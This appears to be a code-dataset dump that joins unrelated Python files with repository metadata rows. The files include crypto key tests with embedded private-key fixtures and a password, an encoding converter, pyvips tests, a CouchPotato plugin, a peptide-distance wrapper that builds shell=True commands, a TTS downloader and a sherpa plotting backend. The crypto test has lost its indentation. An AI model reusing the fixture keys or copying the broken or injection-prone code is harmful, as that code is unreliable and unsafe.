zb0vS+Nfpq6oYsx+gn5TBgMeWIZZrtMEaUU2o+rwsjKBP/gy6D1zC2b4W5O/A/7a
1GR/AkBUQhYoKKc1UpExGtMXfrvRKrmAvatZeM/Rqi4aooAtpfCFEOw82iStJOqY
/VxYPRqCuaKeVvjT31O/4SlumihxAkBahRU0NKYbuoiJThfQ23lIBB7SZadKG4A7
KJs+j3oQ+lyqyFJwqxX7sazpIJBJzMgjhT24LTZenn++LbbEcz1FAkBmDmxoq7qO
Ao6uTm8fnkD4C836wS4mYAPqwRBK1JvnEXEQee9irf+ip89BAg74ViTcGF9lwJwQ
gOM+X5Db+3pK
-----END PRIVATE KEY-----
"""
rsaenc="""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,7FF0E46291D60D35ACA881131C244655
BeJoui1lRQDvvPr+gH8xCdqkcgKCLWpZTvFZmvrqXmPqMHpm20nK0ESAd6kKm8d1
zaglRIHnnO6V7aDcwgOd3IYPEOnG2TIRQniZrwZdrXIfacscJ6Ekq+5YfLuyrRgq
fscGl7ntm/eGLqwrhzuv7jAXpn9QWiiAld0EWcmZCAW7nGaUQtu4rc4ULwL5SC/M
MOCPwpcD3SCQv55dX3cBOtfZ3lPbpgEpTpnNnj8OtxOkkIaG8yol7luwHvoOSyL/
WuXGCpfJE4LzbxnSLhbiN7q+y/Sro3cGc9aO4tXToMqTFel4zqR0YgOeFazlDRi1
mPuZcGLuSIef0kJn7Mg7jt0DQk579rTVxAhIu2rylTwEozkpCp5g4kGTJON++HQr
BRrApm4XlAoH2GX1jqDBoWSnXCRH49jNGQrLwy469i+994cG8uVU9Z5cqm/LDIR9
kwQfTJIvMi0g28NBMVgJ2gLj40OczxDGyNvBIbhPNswHljfsvPVr4vtxDGx8fS0N
lUJUOL9me+XNZ5xGHYuT5DOr7GE+H3hKEg+XfrYEete9BeI4gm9cqESvrLY9EU5Q
tOtnKKL7SglTZ5LxPMAedADC0o01nzr+D3gAiOhSgoZTrnQsSZ7iTJOtm3vNXwJx
AgesYmXtr5mdiBPKQ1QA/jF5LUZji+5KENd5WHNQw7tOlMLDrPFVRfLZg1AQDljx
u16kdyb71Kk3f6GCOfUntGr+kzppc3DDT+RcLetXphOOEQRy6C6/wmz08WlAPlu5
mFfSDijpWxoUHooQISg5mE82oR8V81aBpbLtm7KevwY=
-----END RSA PRIVATE KEY-----
"""
pkcs8crypt="""-----BEGIN ENCRYPTED PRIVATE KEY-----
MIICoTAbBgkqhkiG9w0BBQMwDgQIipVEnsV/gQoCAggABIICgE1i42C4aBhykhOi
EItFRE+9iBgiklGxoCJtukdp1UwDRKy/GJJ1rcS385CQy4Rs0zN8NH1faVRbf4Vt
iNACHtJx30qMCdo64CR+GJYHS4g2lGaz7PFNma8SjnAbGYXwXkdm5zhwmiU++wC7
W59u8oWS8Dj9dZBMzoOQGQT6xzZwQ14H65zHvC16HdKSNtRgXDWkBnD2cQzuOyuf
rFLyEf7/FH6B7/yKDcwsEfu97uPPxMvuusD1UubWnltO/Hc2oCPibN+dGw1PY9mC
18yGQtZkf5z30yhLosF62IVy3XY9Yf/TJYojIExoASrThGRvENzWkQ3qfnErqmng
l+dy66bmLjicobF5bO3xAhpU1dL+4/1ba2QuthVNlg6Or/iII1ntNN4PFyYcEwmX
e09C3dyOtV7qCq13S1bRkbZhzwi2QbLKALAzrZpF6VYmayTz8KjQOZ8BncAM+BiI
CtwuZJoXLW9kT4D7UsaSZdjUvzBIak5qdCGWpKmahMfjEEsCg6ApuIYmFrCgiY9c
0keYjY8DJ+4bEvqsQvTIaU9F9mFytI1E3LnR0NP1jHuOA7Jc+oNQ2adgFNj12jKQ
qNt1bEGNCqQHSrw7JNCrB7s+QAFNqJtno6fIq7vVNkqadJlnBbCIgm7NlJeGg9j6
a5YVNGlbs0J4dQF4Jw13302IBn3piSzthWL2gL98v/1lEwGuernEpPAjry3YhzM9
VA/oVt22n3yVA6dOSVL1oUTJyawEqASmH0jHAzXNDz+QLSLmz82ARcZPqPvVc45e
5h0xtqtFVkQLNbYzpNWGrx7R1hdr84nOKa8EsIxTRgEL/w9Y4Z/3xEoK2+KVBpMk
oxUuxuU=
-----END ENCRYPTED PRIVATE KEY-----
"""
password="1111"
rsakeytext="""Public-Key: (1024 bit)
Modulus:
00:bf:42:cd:56:6e:f5:b7:33:4e:60:7c:ef:be:a9:
3d:4a:0f:a3:a5:9b:01:fc:10:aa:a8:86:ae:3f:75:
6e:4d:a6:60:4f:8c:34:ba:38:c8:84:07:e3:92:1c:
c0:6c:e4:c9:2f:3e:63:24:09:7f:c0:6e:c7:90:42:
a1:9d:a7:c3:35:e6:e7:e2:59:93:19:0d:d6:6b:4c:
ce:2b:76:0f:bf:e1:1e:6a:d9:2e:84:9b:af:4b:31:
5c:5a:c3:e1:ad:f9:44:8e:21:5e:74:8a:f5:29:34:
d6:c5:c0:4d:ed:8e:80:7c:e6:e6:79:35:b0:6f:7b:
1b:a4:85:ab:b0:87:7b:78:2f
Exponent: 65537 (0x10001)
"""
ec1priv="""-----BEGIN PRIVATE KEY-----
MIGEAgEAMBAGByqGSM49AgEGBSuBBAAKBG0wawIBAQQgKnG6neqZvB98EEuuxnHs
fv+L/5abuNNG20wzUqRpncOhRANCAARWKXWeUZ6WiCKZ2kHx87jmJyx0G3ZB1iQC
+Gp2AJYswbQPhGPigKolzIbZYfwnn7QOca6N8QDhPAn3QQK8trZI
-----END PRIVATE KEY-----
"""
ec1keytext="""Public-Key: (256 bit)
pub:
04:56:29:75:9e:51:9e:96:88:22:99:da:41:f1:f3:
b8:e6:27:2c:74:1b:76:41:d6:24:02:f8:6a:76:00:
96:2c:c1:b4:0f:84:63:e2:80:aa:25:cc:86:d9:61:
fc:27:9f:b4:0e:71:ae:8d:f1:00:e1:3c:09:f7:41:
02:bc:b6:b6:48
ASN1 OID: secp256k1
"""
ec1pub="""-----BEGIN PUBLIC KEY-----
MFYwEAYHKoZIzj0CAQYFK4EEAAoDQgAEVil1nlGelogimdpB8fO45icsdBt2QdYk
AvhqdgCWLMG0D4Rj4oCqJcyG2WH8J5+0DnGujfEA4TwJ90ECvLa2SA==
-----END PUBLIC KEY-----
"""
def test_unencrypted_pem(self):
key=PKey(privkey=self.rsa)
self.assertTrue(key.cansign)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_pem(self):
key=PKey(privkey=self.rsaenc,password=self.password)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_pem_cb(self):
cb=lambda x:self.password
key=PKey(privkey=self.rsaenc,password=cb)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encryped_pem_pkcs8(self):
key=PKey(privkey=self.pkcs8crypt,password=self.password)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_der_pkcs8(self):
pkcs8der = pem2der(self.pkcs8crypt)
key=PKey(privkey=pkcs8der,password=self.password,format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_export_priv_pem(self):
key=PKey(privkey=self.ec1priv)
out=key.exportpriv()
self.assertEqual(self.ec1priv,out)
def test_export_priv_encrypt(self):
from ctypescrypto.cipher import CipherType
key=PKey(privkey=self.rsa)
pem=key.exportpriv(password='2222',cipher=CipherType("aes256"))
if pyver >2:
pem = pem.encode("ascii")
self.assertEqual(runopenssl(["pkey","-text_pub","-noout","-passin","pass:2222"],
pem),self.rsakeytext)
def test_export_priv_der(self):
key=PKey(privkey=self.rsa)
der=key.exportpriv(format="DER")
self.assertEqual(runopenssl(["pkey","-text_pub","-noout","-inform","DER"],
der),self.rsakeytext)
def test_export_priv_der_enc(self):
from ctypescrypto.cipher import CipherType
key=PKey(privkey=self.rsa)
der=key.exportpriv(format="DER",password='2222',cipher=CipherType("aes256"))
self.assertEqual(runopenssl(["pkcs8","-passin","pass:2222","-inform","DER"],
der),self.rsa)
def test_unencrypted_pem_ec(self):
key=PKey(privkey=self.ec1priv)
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_unencrypted_der_ec(self):
key=PKey(privkey=pem2der(self.ec1priv),format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_pubkey_pem(self):
key=PKey(pubkey=self.ec1pub)
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_pubkey_der(self):
key=PKey(pubkey=pem2der(self.ec1pub),format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_compare(self):
key1=PKey(privkey=self.ec1priv)
self.assertIsNotNone(key1.key)
key2=PKey(pubkey=self.ec1pub)
self.assertIsNotNone(key2.key)
self.assertEqual(key1,key2)
def test_sign(self):
signer=PKey(privkey=self.ec1priv)
digest=b16decode("FFCA2587CFD4846E4CB975B503C9EB940F94566AA394E8BD571458B9DA5097D5")
signature=signer.sign(digest)
self.assertTrue(len(signature)>0)
verifier=PKey(pubkey=self.ec1pub)
self.assertTrue(verifier.verify(digest,signature))
def test_generate(self):
newkey=PKey.generate("rsa")
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (1024 bit)")
def test_generate_params(self):
newkey=PKey.generate("rsa",rsa_keygen_bits=2048)
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (2048 bit)")
def test_generate_ec(self):
templkey=PKey(pubkey=self.ec1pub)
newkey=PKey.generate("ec",paramsfrom=templkey)
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (256 bit)")
self.assertNotEqual(str(templkey),str(newkey))
if __name__ == "__main__":
unittest.main()
|
mit
| -7,343,754,033,386,160,000
| 43.125604
| 92
| 0.737464
| false
| 2.072142
| true
| false
| false
|
x522758754/XlsTools
|
xlsDelCol.py
|
1
|
3807
|
#!/user/bin/env python
# coding:utf-8
import sys
import os
import codecs
import pandas as pd
reload(sys)
sys.setdefaultencoding('utf-8')
# Index of the column to delete, counting from 0
DELCOL = 1
_DictFileCoding = dict()
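# Maps each UTF-8 working copy to the detected encoding of its source file so
# the edited copy can be written back in the original encoding (see main()).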
def GetAllTxt(srcPath, dstPath):
#print path
srcfiles = []
dstfiles = []
for root, dirs, files in os.walk(srcPath):
for f in files:
if f.endswith('.txt'):
srcfile = os.path.join(root, f)
srcfiles.append(srcfile)
#filePath = filePath.replace('\\','/')
dstfile = srcfile.replace(srcPath, dstPath, 1)
dstfiles.append(dstfile)
return srcfiles, dstfiles
def handleEncoding2Utf(original_file,newfile):
#newfile=original_file[0:original_file.rfind(.)]+'_copy.csv'
f=open(original_file,'rb+')
    content=f.read() # read the file contents; content is bytes, not str
source_encoding='utf-8'
    ##### determine the source encoding
try:
content.decode('utf-8').encode('utf-8')
source_encoding='utf-8'
except:
try:
content.decode('gbk').encode('utf-8')
source_encoding='gbk'
except:
try:
content.decode('gb2312').encode('utf-8')
source_encoding='gb2312'
except:
try:
content.decode('gb18030').encode('utf-8')
source_encoding='gb18030'
except:
try:
content.decode('big5').encode('utf-8')
                        source_encoding='big5'
except:
content.decode('cp936').encode('utf-8')
source_encoding='cp936'
f.close()
    ##### re-read the file with the detected encoding and save it as UTF-8:
block_size=4096
#print(original_file, source_encoding)
dstDir = os.path.dirname(newfile)
if not os.path.exists(dstDir):
os.makedirs(dstDir)
with codecs.open(original_file,'r',source_encoding) as f:
with codecs.open(newfile,'w','utf-8') as f2:
while True:
content=f.read(block_size)
if not content:
break
f2.write(content)
_DictFileCoding[newfile] = source_encoding
def handleEncodingUtf2(original_file, newfile, coding = 'gbk'):
block_size=4096
source_encoding = 'utf-8'
#print(original_file, source_encoding)
dstDir = os.path.dirname(newfile)
if not os.path.exists(dstDir):
os.makedirs(dstDir)
with codecs.open(original_file,'r',source_encoding) as f:
with codecs.open(newfile,'w', coding) as f2:
while True:
content=f.read(block_size)
if not content:
break
f2.write(content)
def DelRowFile(srcPath, dstPath):
dir = os.path.dirname(dstPath)
if not os.path.exists(dir):
os.makedirs(dir)
with open(srcPath) as fp_in:
with open(dstPath, 'w') as fp_out:
#fp_out.writelines(line for i, line in enumerate(fp_in) if i != DELROW)
for line in fp_in.readlines():
print line
fp_out.write(line)
def DelColFile(srcPath):
#df = pd.read_csv(srcPath, encoding='utf-8')
df = pd.read_csv(srcPath,sep='\t',header=None, encoding='utf-8',)
df.drop([df.columns[DELCOL]], axis=1, inplace=True)
df.to_csv(srcPath, sep='\t',header=None, encoding='utf-8',index=None)
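# A minimal standalone sketch of the drop performed by DelColFile above
# (illustrative only; uses an in-memory frame instead of a real file):
#
#   import pandas as pd
#   df = pd.DataFrame([['id1', 'name1', 10]])
#   df.drop([df.columns[DELCOL]], axis=1, inplace=True)  # with DELCOL = 1, 'name1' is removed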
def main(argv):
#temp='TaskConfig'
#handleEncoding2Utf('Data/public/' + temp +'.txt', 'Dat/' + temp +'.txt')
#DelColFile('Dat/' + temp +'.txt')
#handleEncodingUtf2('Dat/' + temp +'.txt', 'Da/' + temp +'.txt')
#return
src = ""
dst = ""
if(len(argv) != 3):
#return
src = 'Data'
dst = 'Datas'
else:
src = argv[1]
dst = argv[2]
if not os.path.exists(src):
        print u'Error! ---------------- source directory %s does not exist' %(src)
return
    print u'---------------- source directory %s---------------' %(src)
    print u'---------------- target directory %s---------------' %(dst)
srcfiles, dstfiles = GetAllTxt(src, dst)
fLen = len(srcfiles)
for i in range(fLen):
src_file = srcfiles[i]
dst_file = dstfiles[i]
handleEncoding2Utf(src_file, dst_file)
DelColFile(dst_file)
handleEncodingUtf2(dst_file, src_file,_DictFileCoding[dst_file])
if('__main__' == __name__):
main(sys.argv)
|
mit
| 5,793,836,253,580,370,000
| 25.134752
| 74
| 0.652917
| false
| 2.578726
| false
| false
| false
|
kleisauke/pyvips
|
pyvips/tests/test_gvalue.py
|
1
|
3235
|
# vim: set fileencoding=utf-8 :
import unittest
import pyvips
from .helpers import PyvipsTester, JPEG_FILE
class TestGValue(PyvipsTester):
def test_bool(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gbool_type)
gv.set(True)
value = gv.get()
self.assertEqual(value, True)
gv.set(False)
value = gv.get()
self.assertEqual(value, False)
def test_int(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gint_type)
gv.set(12)
value = gv.get()
self.assertEqual(value, 12)
def test_double(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gdouble_type)
gv.set(3.1415)
value = gv.get()
self.assertEqual(value, 3.1415)
def test_enum(self):
# the Interpretation enum is created when the first image is made --
# make it ourselves in case we are run before the first image
pyvips.vips_lib.vips_interpretation_get_type()
interpretation_gtype = pyvips.gobject_lib. \
g_type_from_name(b'VipsInterpretation')
gv = pyvips.GValue()
gv.set_type(interpretation_gtype)
gv.set('xyz')
value = gv.get()
self.assertEqual(value, 'xyz')
def test_flags(self):
# the OperationFlags enum is created when the first op is made --
# make it ourselves in case we are run before that
pyvips.vips_lib.vips_operation_flags_get_type()
operationflags_gtype = pyvips.gobject_lib. \
g_type_from_name(b'VipsOperationFlags')
gv = pyvips.GValue()
gv.set_type(operationflags_gtype)
gv.set(12)
value = gv.get()
self.assertEqual(value, 12)
def test_string(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gstr_type)
gv.set('banana')
value = gv.get()
self.assertEqual(value, 'banana')
def test_array_int(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_int_type)
gv.set([1, 2, 3])
value = gv.get()
self.assertAlmostEqualObjects(value, [1, 2, 3])
def test_array_double(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_double_type)
gv.set([1.1, 2.1, 3.1])
value = gv.get()
self.assertAlmostEqualObjects(value, [1.1, 2.1, 3.1])
def test_image(self):
image = pyvips.Image.new_from_file(JPEG_FILE)
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.image_type)
gv.set(image)
value = gv.get()
self.assertEqual(value, image)
def test_array_image(self):
image = pyvips.Image.new_from_file(JPEG_FILE)
r, g, b = image.bandsplit()
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_image_type)
gv.set([r, g, b])
value = gv.get()
self.assertEqual(value, [r, g, b])
def test_blob(self):
with open(JPEG_FILE, 'rb') as f:
blob = f.read()
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.blob_type)
gv.set(blob)
value = gv.get()
self.assertEqual(value, blob)
if __name__ == '__main__':
unittest.main()
|
mit
| 4,357,290,625,036,344,300
| 29.233645
| 76
| 0.57898
| false
| 3.023364
| true
| false
| false
|
TNosredna/CouchPotatoServer
|
couchpotato/core/plugins/suggestion/main.py
|
1
|
3422
|
from couchpotato import get_session
from couchpotato.api import addApiView
from couchpotato.core.event import fireEvent
from couchpotato.core.helpers.encoding import ss
from couchpotato.core.helpers.variable import splitString, md5
from couchpotato.core.plugins.base import Plugin
from couchpotato.core.settings.model import Movie
from couchpotato.environment import Env
from sqlalchemy.sql.expression import or_
class Suggestion(Plugin):
def __init__(self):
addApiView('suggestion.view', self.suggestView)
addApiView('suggestion.ignore', self.ignoreView)
def suggestView(self, **kwargs):
movies = splitString(kwargs.get('movies', ''))
ignored = splitString(kwargs.get('ignored', ''))
limit = kwargs.get('limit', 6)
if not movies or len(movies) == 0:
db = get_session()
active_movies = db.query(Movie) \
.filter(or_(*[Movie.status.has(identifier = s) for s in ['active', 'done']])).all()
movies = [x.library.identifier for x in active_movies]
if not ignored or len(ignored) == 0:
ignored = splitString(Env.prop('suggest_ignore', default = ''))
cached_suggestion = self.getCache('suggestion_cached')
if cached_suggestion:
suggestions = cached_suggestion
else:
suggestions = fireEvent('movie.suggest', movies = movies, ignore = ignored, single = True)
self.setCache(md5(ss('suggestion_cached')), suggestions, timeout = 6048000) # Cache for 10 weeks
return {
'success': True,
'count': len(suggestions),
'suggestions': suggestions[:limit]
}
def ignoreView(self, imdb = None, limit = 6, remove_only = False, **kwargs):
ignored = splitString(Env.prop('suggest_ignore', default = ''))
if imdb:
if not remove_only:
ignored.append(imdb)
Env.prop('suggest_ignore', ','.join(set(ignored)))
new_suggestions = self.updateSuggestionCache(ignore_imdb = imdb, limit = limit, ignored = ignored)
return {
'result': True,
'ignore_count': len(ignored),
'suggestions': new_suggestions[limit - 1:limit]
}
def updateSuggestionCache(self, ignore_imdb = None, limit = 6, ignored = None):
# Combine with previous suggestion_cache
cached_suggestion = self.getCache('suggestion_cached')
new_suggestions = []
ignored = [] if not ignored else ignored
if ignore_imdb:
for cs in cached_suggestion:
if cs.get('imdb') != ignore_imdb:
new_suggestions.append(cs)
# Get new results and add them
if len(new_suggestions) - 1 < limit:
db = get_session()
active_movies = db.query(Movie) \
.filter(or_(*[Movie.status.has(identifier = s) for s in ['active', 'done']])).all()
movies = [x.library.identifier for x in active_movies]
ignored.extend([x.get('imdb') for x in cached_suggestion])
suggestions = fireEvent('movie.suggest', movies = movies, ignore = list(set(ignored)), single = True)
if suggestions:
new_suggestions.extend(suggestions)
self.setCache(md5(ss('suggestion_cached')), new_suggestions, timeout = 6048000)
return new_suggestions
|
gpl-3.0
| 2,790,638,608,713,622,000
| 36.604396
| 113
| 0.611631
| false
| 4.035377
| false
| false
| false
|
FRED-2/Fred2-Apps
|
src/Distance2SelfBinding.py
|
2
|
3775
|
# This code is part of the Fred2 distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
from tempfile import NamedTemporaryFile
__author__ = 'mohr,schubert'
import os
import subprocess
import logging
import itertools
import pandas
from Fred2.Core import Allele, AExternal
import DistanceMatrices
from DistanceMatrix import DistanceMatrix
class Distance2Self(object):
"""
    Implements the calculation routine for distance to (self) peptides.
    Calculates the k closest distances of a peptide to a peptide set represented as a trie.
    All our matrices have the same ordering of letters.
    If you use a new matrix, please make sure to use the same ordering! Otherwise the tries have to be recomputed!
"""
def __init__(self, _matrix, trie=None, saveTrieFile=False):
self.__saveTrieFile = saveTrieFile
self.__matrix = _matrix
self.__trie = trie
this_dir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
self.__externalPathDistanceCalculator = os.path.join(this_dir, 'compute_distances_ivac')
self.__externalPathTrieGenerator = os.path.join(this_dir, 'get_TrieArray')
def __del__(self):
if not self.__saveTrieFile:
pass
def generate_trie(self, fastaFile, outfile='peptideTrie', peptideLength=9):
cmd = self.__externalPathTrieGenerator + " %s %s %s %s"
specifiedTrie = outfile
self.__trie = specifiedTrie
subprocess.check_output(cmd%(fastaFile, self.__matrix.path_to_matrix_file, peptideLength, specifiedTrie), shell=True)
def calculate_distances(self, peptides, pep_header="neopeptide", specifiedTrie="uniprot_proteome_l9", n=10):
def __load_trie(trieSource):
current = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
return os.path.join(current,"data","tries","{}.trie".format(trieSource))
# create temporary file with peptides for distance computation
tmpFile = NamedTemporaryFile(delete=False)
with open(tmpFile.name, "w") as peptidesFile:
for pep in peptides:
peptidesFile.write('%s\n' % pep)
cmd = self.__externalPathDistanceCalculator + " %s %s %s %s"
results = {}
trie = specifiedTrie if os.path.isfile(specifiedTrie) else __load_trie(specifiedTrie)
method = os.path.basename(specifiedTrie).split('.')[0] if os.path.isfile(specifiedTrie) else specifiedTrie
try:
re = self.parse_external_result(
subprocess.check_output(cmd % (self.__matrix.path_to_matrix_file, trie, tmpFile.name, n),shell=True))
for k, vs in re.iteritems():
results.setdefault(pep_header, []).append(k)
results.setdefault("trie", []).append(method)
for i,v in enumerate(vs):
if i > 0:
results.setdefault("distance_{i}".format(i=i),[]).append(float(v))
else:
results.setdefault("distance", []).append(float(v))
except:
logging.warning("Could not make distance calculation for trie {}".format(trie))
os.remove(tmpFile.name)
return pandas.DataFrame.from_dict(results)
def parse_external_result(self, result):
"""
:rtype : DataFrame
"""
parsedResult = {}
for line in result.strip().split('\n'):
splitted = line.strip().split(" ")[-1].split(";")
distanceValues = []
peptide = splitted[0].split(":")[0]
for s in splitted[:-1]:
distanceValues.append(float(s.split(",")[-1])/float(len(peptide)))
parsedResult[peptide] = distanceValues
return parsedResult
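# Minimal usage sketch (illustrative, not part of the original module; assumes
# a DistanceMatrix instance `matrix` and the bundled "uniprot_proteome_l9" trie):
#
#   d2s = Distance2Self(matrix)
#   df = d2s.calculate_distances(["SYFPEITHI"], n=10)
#   print(df[["neopeptide", "distance"]])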
|
bsd-3-clause
| 6,947,356,897,559,048,000
| 36.009804
| 125
| 0.63894
| false
| 3.801611
| false
| false
| false
|
xe1gyq/nuupxe
|
core/GoogleTTS.py
|
1
|
5682
|
#!/usr/bin/python
import commands
import sys
import argparse
import re
import urllib, urllib2
import time
from collections import namedtuple
def split_text(input_text, max_length=100):
"""
Try to split between sentences to avoid interruptions mid-sentence.
Failing that, split between words.
See split_text_rec
"""
def split_text_rec(input_text, regexps, max_length=max_length):
"""
Split a string into substrings which are at most max_length.
Tries to make each substring as big as possible without exceeding
max_length.
Will use the first regexp in regexps to split the input into
substrings.
        If it is impossible to make all the segments less than or equal to
        max_length with a regexp, then the next regexp in regexps will be used
        to split those into subsegments.
        If there are still substrings that are too big after all regexps have
        been used, those will be split at max_length.
Args:
input_text: The text to split.
regexps: A list of regexps.
If you want the separator to be included in the substrings you
can add parenthesis around the regular expression to create a
group. Eg.: '[ab]' -> '([ab])'
Returns:
a list of strings of maximum max_length length.
"""
if(len(input_text) <= max_length): return [input_text]
#mistakenly passed a string instead of a list
if isinstance(regexps, basestring): regexps = [regexps]
regexp = regexps.pop(0) if regexps else '(.{%d})' % max_length
text_list = re.split(regexp, input_text)
combined_text = []
#first segment could be >max_length
combined_text.extend(split_text_rec(text_list.pop(0), regexps, max_length))
for val in text_list:
current = combined_text.pop()
concat = current + val
if(len(concat) <= max_length):
combined_text.append(concat)
else:
combined_text.append(current)
#val could be >max_length
combined_text.extend(split_text_rec(val, regexps, max_length))
return combined_text
return split_text_rec(input_text.replace('\n', ''),
['([\,|\.|;]+)', '( )'])
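# Illustrative contract of split_text (not part of the original module): every
# returned chunk is at most max_length characters, with breaks preferred at
# punctuation, then at spaces, then forced at max_length:
#
#   chunks = split_text(some_long_text)
#   assert all(len(c) <= 100 for c in chunks)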
audio_args = namedtuple('audio_args',['language','output'])
def audio_extract(input_text='',args=None):
# This accepts :
# a dict,
# an audio_args named tuple
# or arg parse object
if args is None:
args = audio_args(language='en',output=open('output/output.mp3', 'w'))
if type(args) is dict:
args = audio_args(
language=args.get('language','en'),
output=open(args.get('output','output/output.mp3'), 'w')
)
#process input_text into chunks
#Google TTS only accepts up to (and including) 100 characters long texts.
#Split the text in segments of maximum 100 characters long.
combined_text = split_text(input_text)
#download chunks and write them to the output file
for idx, val in enumerate(combined_text):
mp3url = "http://translate.google.com/translate_tts?tl=%s&q=%s&total=%s&idx=%s" % (
args.language,
urllib.quote(val),
len(combined_text),
idx)
headers = {"Host": "translate.google.com",
"Referer": "http://www.gstatic.com/translate/sound_player2.swf",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) "
"AppleWebKit/535.19 (KHTML, like Gecko) "
"Chrome/18.0.1025.163 Safari/535.19"
}
req = urllib2.Request(mp3url, '', headers)
sys.stdout.write('.')
sys.stdout.flush()
if len(val) > 0:
try:
response = urllib2.urlopen(req)
args.output.write(response.read())
time.sleep(.5)
except urllib2.URLError as e:
print ('%s' % e)
args.output.close()
print('Saved MP3 to %s' % args.output.name)
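# Illustrative call (hypothetical path; requires network access to the Google
# TTS endpoint used above and an existing output/ directory):
#
#   audio_extract('Hello world', {'language': 'en', 'output': 'output/hello.mp3'})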
def text_to_speech_mp3_argparse():
description = 'Google TTS Downloader.'
parser = argparse.ArgumentParser(description=description,
epilog='tunnel snakes rule')
parser.add_argument('-o', '--output',
action='store', nargs='?',
help='Filename to output audio to',
type=argparse.FileType('wb'), default='output/output.mp3')
parser.add_argument('-l', '--language',
action='store',
nargs='?',
help='Language to output text to.', default='en')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-f', '--file',
type=argparse.FileType('r'),
help='File to read text from.')
group.add_argument('-s', '--string',
action='store',
nargs='+',
help='A string of text to convert to speech.')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
print parser.parse_args()
return parser.parse_args()
if __name__ == "__main__":
args = text_to_speech_mp3_argparse()
if args.file:
input_text = args.file.read()
if args.string:
input_text = ' '.join(map(str, args.string))
audio_extract(input_text=input_text, args=args)
commands.getstatusoutput("mpg123 output/output.mp3")
|
apache-2.0
| 6,340,551,672,910,915,000
| 37.917808
| 91
| 0.567054
| false
| 4.078966
| false
| false
| false
|
c17r/TagTrain
|
src/tagtrain/tagtrain/tt_unblacklist.py
|
1
|
1281
|
from tagtrain import data
from tagtrain.tagtrain import TagTrainResponse, C_MEMBER, C_GROUP
class UnBlacklist(TagTrainResponse):
TYPE = TagTrainResponse.TYPE_COMMENTORMESSAGE
CMD_REGEX = f'unblacklist {C_MEMBER} {C_GROUP}?'
HELP_TEXT = ("`u/{botname} unblacklist <member-name> [<group-name>]` - "
"Allows previously blacklisted specified Member to add themselves, either for all "
"your Groups or just specified Group")
def run(self, reply, message, match):
self.LOGGER.debug('blacklist')
owner_name = message.author.name
member_name = match.group('member')
group_name = match.group('group')
try:
data.by_owner.unblacklist_user(owner_name, member_name, group_name)
except data.Group.DoesNotExist:
reply.append(f'Group `{group_name}` does not exist. Skipping.')
return
except data.Blacklist.DoesNotExist:
t = f'Group `{group_name}`' if group_name else 'Blanket'
reply.append(t + f' Blacklist for Member `{member_name}` does not exist. Skipping.')
return
t = f'Group `{group_name}`' if group_name else 'Blanket'
reply.append(t + f' Blacklist for Member `{member_name}` removed.')
|
mit
| 5,373,507,038,095,940,000
| 40.322581
| 100
| 0.63388
| false
| 3.823881
| false
| false
| false
|
anetasie/sherpa
|
sherpa/astro/datastack/plot_backend/plot_matplotlib.py
|
4
|
2185
|
#
# Copyright (C) 2010, 2014, 2015 Smithsonian Astrophysical Observatory
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Plotting routines for the data stack module provided by matplotlib.
"""
import matplotlib.pyplot as plt
name = "pylab_backend"
def initialize_backend():
"""Ensure that the plotting backend is initialized.
"""
pass
def initialize_plot(dataset, ids):
"""Create the plot window or figure for the given dataset.
Parameters
----------
dataset : str or int
The dataset.
ids : array_like
The identifier array from the DataStack object.
See Also
--------
select_plot
"""
plt.figure(ids.index(dataset['id']) + 1)
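# Illustrative mapping (not in the original backend): with ids == [1, 2, 'src'],
# the dataset {'id': 'src'} is drawn in matplotlib figure 3 (index 2 plus 1).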
def select_plot(dataset, ids):
"""Select the plot window or figure for the given dataset.
The plot for this dataset is assumed to have been created.
Parameters
----------
dataset : str or int
The dataset.
ids : array_like
The identifier array from the DataStack object.
See Also
--------
initialize_plot
"""
plt.figure(ids.index(dataset['id']) + 1)
def save_plot(*args, **kwargs):
"""Save the current plot."""
plt.savefig(*args, **kwargs)
# How is this different from the _print_window/savefig methods
# of the DataStack class?
